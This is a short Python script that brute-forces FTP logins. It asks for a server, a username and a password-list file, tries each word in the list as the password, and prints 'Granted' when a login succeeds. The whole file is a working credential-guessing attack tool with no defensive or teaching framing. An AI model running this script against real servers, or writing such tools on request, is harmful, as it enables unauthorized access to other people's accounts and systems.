#!/usr/bin/python3
import ftplib
server = input("FTP: Server")
user = input("Username")
# Path is:  /home/somename/Documents/somepasslist.txt
Passwordlist = input("Path to password list >")
try:
	with open(Passwordlist,"r") as pw:
		for word in pw:
			word = word.strip("\r").strip("\n")
			try:
				ftp = ftplib.FTP(server)
				ftp.login(user,word)
				print("Granted: "+"it's"+word)
			except:
				print("Still trying...")
except:
	print("ERROR!")
